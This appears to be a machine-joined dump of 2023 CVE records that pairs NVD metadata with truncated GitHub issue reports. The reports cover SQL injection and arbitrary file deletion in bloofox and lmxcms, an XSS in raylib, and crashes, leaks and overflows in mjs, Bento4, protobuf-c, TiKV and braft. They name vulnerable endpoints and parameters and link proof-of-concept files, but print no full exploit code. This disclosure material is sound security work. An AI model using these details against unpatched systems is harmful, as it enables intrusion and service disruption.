[ "cesanta", "mjs" ]
# SEGV src/mjs_gc.c:190:11 in gc_sweep ## project address https://github.com/cesanta/mjs ## info OS:Ubuntu20.04 TLS Build: `$(DOCKER_CLANG) -fsanitize=address $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)` ## Poc https://github.com/z1r00/fuzz_vuln/blob/main/mjs/SEGV/mjs_gc/poc6.zip ...
SEGV src/mjs_gc.c:190:11 in gc_sweep
https://api.github.com/repos/cesanta/mjs/issues/241/comments
0
2023-03-06T01:35:33Z
2023-03-06T01:35:33Z
https://github.com/cesanta/mjs/issues/241
1,610,494,409
241
4,977
CVE-2023-27812
2023-04-13T14:15:08.277
bloofox v0.5.2 was discovered to contain an arbitrary file deletion vulnerability via the delete_file() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "in...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://bloofox.com" }, { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "https://github.com/jspring996" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tra...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bloofox:bloofoxcms:0.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "50AFAD87-F6BD-4415-A89B-9B7D175DACDB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "22" ]
22
https://github.com/jspring996/PHPcodecms/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jspring996", "PHPcodecms" ]
Specific operation demonstration Find the globally defined delete function ![image.png](https://raw.githubusercontent.com/jspring996/PHPcodecms/main/bloofox/Arbitrary%20file%20deletion/1.png) Find where delete_file() is called, and then find the condition that the function point code if requires. When these two...
bloofox 0.5.2 any file deletion
https://api.github.com/repos/jspring996/PHPcodecms/issues/1/comments
0
2023-03-03T03:25:39Z
2023-03-03T05:01:14Z
https://github.com/jspring996/PHPcodecms/issues/1
1,607,878,992
1
4,978
CVE-2023-29597
2023-04-13T14:15:08.810
bloofox v0.5.2 was discovered to contain a SQL injection vulnerability via the component /index.php?mode=content&page=pages&action=edit&eid=1.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jspring996/PHPcodecms/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jspr...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bloofox:bloofoxcms:0.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "50AFAD87-F6BD-4415-A89B-9B7D175DACDB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "89" ]
89
https://github.com/jspring996/PHPcodecms/issues/2
[ "Exploit", "Issue Tracking" ]
github.com
[ "jspring996", "PHPcodecms" ]
### **background sql injection** source address https://github.com/alexlang24/bloofoxCMS/archive/refs/heads/master.zip Injection exists at /admin/index.php?mode=content&page=pages&action=edit&eid=1 ![image](https://github.com/jspring996/PHPcodecms/blob/main/bloofox/sql%20injection/1.jpg?raw=true) Find the co...
bloofox 0.5.2 sql injection
https://api.github.com/repos/jspring996/PHPcodecms/issues/2/comments
0
2023-03-06T07:46:13Z
2023-03-30T07:55:23Z
https://github.com/jspring996/PHPcodecms/issues/2
1,610,846,217
2
4,979
CVE-2023-29598
2023-04-13T14:15:08.970
lmxcms v1.4.1 was discovered to contain a SQL injection vulnerability via the setbook parameter at index.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jspring996/PHPcodecms/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/jspr...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lmxcms:lmxcms:1.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "F36D0C7D-0C6D-4FEF-B74A-07EEB8BDBC2A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "89" ]
89
https://github.com/jspring996/PHPcodecms/issues/3
[ "Exploit", "Issue Tracking" ]
github.com
[ "jspring996", "PHPcodecms" ]
This is the message page of the front desk ![image](https://github.com/jspring996/PHPcodecms/blob/main/lmxcms/Front%20page%20sql%20injection/1.jpg?raw=true) Find the back-end code through the front page. The ischeck is to judge whether the content of the message is displayed on the page. There are several key funct...
lmxcms v1.4.1 Front page sql injection
https://api.github.com/repos/jspring996/PHPcodecms/issues/3/comments
0
2023-03-09T10:35:04Z
2023-03-09T10:35:04Z
https://github.com/jspring996/PHPcodecms/issues/3
1,616,909,815
3
4,980
CVE-2023-27772
2023-04-13T18:15:13.573
libiec61850 v1.5.1 was discovered to contain a segmentation violation via the function ControlObjectClient_setOrigin() at /client/client_control.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/mz-automation/libiec61850/commit/79a8eaf26070e02044afc4b2ffbfe777dfdf3e0b" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "htt...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mz-automation:libiec61850:1.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D608A908-8E8B-4501-B682-FCF5BFBA972C", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "754" ]
754
https://github.com/mz-automation/libiec61850/issues/442
[ "Exploit", "Vendor Advisory" ]
github.com
[ "mz-automation", "libiec61850" ]
Hi, team There is a SEGV in function `ControlObjectClient_setOrigin` in `src/iec61850/client/client_control.c:328` when called from libiec61850/examples/iec61850_client_example_control/client_example_control.c:60. Steps to reproduce: I used **gcc 9.4 and AddressSanitizer**(`export CFLAGS="-g -fsanitize=address" CX...
SEGV in function ControlObjectClient_setOrigin()
https://api.github.com/repos/mz-automation/libiec61850/issues/442/comments
1
2023-02-23T15:10:23Z
2023-02-28T13:41:19Z
https://github.com/mz-automation/libiec61850/issues/442
1,597,037,147
442
4,981
CVE-2023-29573
2023-04-13T20:15:16.690
Bento4 v1.6.0-639 was discovered to contain an out-of-memory bug in the mp4info component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/840" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "770" ]
770
https://github.com/axiomatic-systems/Bento4/issues/840
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Summary Hello, I found out-of-memory bug in mp4info # BUG out-of-memory (/home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/cmakebuild/mp4info+0x4c44ed) in operator new(unsigned long) # Build ubuntu 20.04 ``` export CC=clang export CXX=clang++ export CFLAGS="-fsanitize=address -g" export CXXFLAGS="-fsani...
out-of-memory in mp4info
https://api.github.com/repos/axiomatic-systems/Bento4/issues/840/comments
0
2023-03-14T02:26:20Z
2024-02-17T17:08:01Z
https://github.com/axiomatic-systems/Bento4/issues/840
1,622,614,615
840
4,982
CVE-2022-48468
2023-04-13T21:15:07.077
protobuf-c before 1.4.1 has an unsigned integer overflow in parse_required_member.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/protobuf-c/protobuf-c/commit/ec3d900001a13ccdaa8aef996b34c61159c76217" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:protobuf-c_project:protobuf-c:*:*:*:*:*:*:*:*", "matchCriteriaId": "036DA1F5-7D0A-427C-B29F-90FA388EBB1E", "versionEndExcluding": "1.4.1", "versionEndIncluding": null, "versi...
[ "190" ]
190
https://github.com/protobuf-c/protobuf-c/issues/499
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "protobuf-c", "protobuf-c" ]
Bug: len - pref_len will cause integer overlow. Sugested fix below: diff --git a/protobuf-c/protobuf-c.c b/protobuf-c/protobuf-c.c index ad1bdb1..fe5ae91 100644 --- a/protobuf-c/protobuf-c.c +++ b/protobuf-c/protobuf-c.c @@ -2604,10 +2604,13 @@ parse_required_member(ScannedMember *scanned_member, ...
unsigned integer overflow
https://api.github.com/repos/protobuf-c/protobuf-c/issues/499/comments
5
2022-03-15T14:03:41Z
2023-06-05T07:50:49Z
https://github.com/protobuf-c/protobuf-c/issues/499
1,169,719,813
499
4,983
CVE-2023-30635
2023-04-13T23:15:11.180
TiKV 6.1.2 allows remote attackers to cause a denial of service (fatal error) upon an attempt to get a timestamp from the Placement Driver.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/tikv/tikv/issues/14516" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/tikv/tikv/is...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tikv:tikv:6.1.2:*:*:*:*:*:*:*", "matchCriteriaId": "041FFDE5-14DD-4D92-9C55-203FA9E6B7F8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "400" ]
400
https://github.com/tikv/tikv/issues/14516
[ "Exploit", "Issue Tracking" ]
github.com
[ "tikv", "tikv" ]
## Bug Report ### What version of TiKV are you using? v6.1.2 ### What operating system and CPU are you using? ubuntu ### Steps to reproduce Run Jepsen test configured with kill, pause and membership nemesis ### What did you expect? No fatal ### What happened? `[2023/03/16 15:24:47.529 +00:00] [FATAL...
fatal about failed to get timestamp from PD
https://api.github.com/repos/tikv/tikv/issues/14516/comments
0
2023-04-05T02:05:24Z
2023-04-05T02:05:36Z
https://github.com/tikv/tikv/issues/14516
1,654,811,619
14,516
4,984
CVE-2023-30636
2023-04-13T23:15:11.650
TiKV 6.1.2 allows remote attackers to cause a denial of service (fatal error, with RpcStatus UNAVAILABLE for "not leader") upon an attempt to start a node in a situation where the context deadline is exceeded
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/tikv/tikv/issues/14517" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/tikv/tikv/is...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tikv:tikv:6.1.2:*:*:*:*:*:*:*", "matchCriteriaId": "041FFDE5-14DD-4D92-9C55-203FA9E6B7F8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "770" ]
770
https://github.com/tikv/tikv/issues/14517
[ "Exploit", "Issue Tracking" ]
github.com
[ "tikv", "tikv" ]
## Bug Report <!-- Thanks for your bug report! Don't worry if you can't fill out all the sections. --> ### What version of TiKV are you using? V6.1.2 ### What operating system and CPU are you using? ubuntu ### Steps to reproduce Run Jepsen test configured with the set workload and the kill/pause/partitio...
failed to start node: Grpc
https://api.github.com/repos/tikv/tikv/issues/14517/comments
1
2023-04-05T02:19:13Z
2023-04-12T05:25:30Z
https://github.com/tikv/tikv/issues/14517
1,654,819,904
14,517
4,985
CVE-2023-30637
2023-04-13T23:15:11.933
Baidu braft 1.1.2 has a memory leak related to use of the new operator in example/atomic/atomic_server. NOTE: installations with brpc-0.14.0 and later are unaffected.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/baidu/braft/issues/393" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/baidu/braft/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:baidu:braft:1.1.2:*:*:*:*:*:*:*", "matchCriteriaId": "1F6D70A8-0E73-4E39-B685-20A2EE9B2D51", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "401" ]
401
https://github.com/baidu/braft/issues/393
[ "Exploit", "Issue Tracking" ]
github.com
[ "baidu", "braft" ]
We found one memory leak bug while running atomic-server. Here is the bug report from the sanitizer: ``` Direct leak of 56 byte(s) in 1 object(s) allocated from: -- #0 0x71f63d in operator new(unsigned long) (/opt/fs/braft/example/atomic/atomic_server+0x71f63d) #1 0xd4f40f in brpc::Server::StartInternal(butil::E...
Memory leak in atomic server
https://api.github.com/repos/baidu/braft/issues/393/comments
2
2023-03-27T05:33:16Z
2024-12-20T09:08:20Z
https://github.com/baidu/braft/issues/393
1,641,408,963
393
4,986
CVE-2023-26123
2023-04-14T05:15:13.867
Versions of the package raysan5/raylib before 4.5.0 are vulnerable to Cross-site Scripting (XSS) such that the SetClipboardText API does not properly escape the ' character, allowing attacker-controlled input to break out of the string and execute arbitrary JavaScript via emscripten_run_script function. **Note:** This...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "report@snyk.io", "tags": [ "Patch" ], "url": "https://github.com/raysan5/raylib/commit/b436c8d7e5346a241b00511a11585936895d959d" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:raylib:raylib:*:*:*:*:*:*:*:*", "matchCriteriaId": "CEDAAF81-EA14-4AEF-9C38-FB3063261835", "versionEndExcluding": "4.5.0", "versionEndIncluding": null, "versionStartExcluding...
[ "79" ]
79
https://github.com/raysan5/raylib/issues/2954
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "raysan5", "raylib" ]
**WARNING: Please, read this note carefully before submitting a new issue:** It is important to realise that **this is NOT A SUPPORT FORUM**, this is for reproducible BUGS with raylib ONLY. There are lots of generous and helpful people ready to help you out on [raylib Discord forum](https://discord.gg/raylib) or ...
[core] JS Injection/XSS Vulnerability in SetClipboardText
https://api.github.com/repos/raysan5/raylib/issues/2954/comments
3
2023-03-10T18:28:51Z
2023-03-12T12:48:30Z
https://github.com/raysan5/raylib/issues/2954
1,619,427,454
2,954
4,987
CVE-2023-29569
2023-04-14T12:15:07.770
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via ffi_cb_impl_wpwwwww at src/mjs_ffi.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/239" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/z1r00/fuzz_vuln/blob/main/mjs...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "476" ]
476
https://github.com/cesanta/mjs/issues/239
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
# SEGV src/mjs_ffi.c:456 in ffi_cb_impl_wpwwwww ## project address https://github.com/cesanta/mjs ## info OS:Ubuntu20.04 TLS Build: `$(DOCKER_CLANG) -fsanitize=address $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)` ## Poc https://github.com/z1r00/fuzz_vuln/blob/main/mjs/SEGV/mjs_ffi...
SEGV src/mjs_ffi.c:456 in ffi_cb_impl_wpwwwww
https://api.github.com/repos/cesanta/mjs/issues/239/comments
0
2023-03-06T01:14:12Z
2023-03-06T01:14:12Z
https://github.com/cesanta/mjs/issues/239
1,610,480,695
239
4,988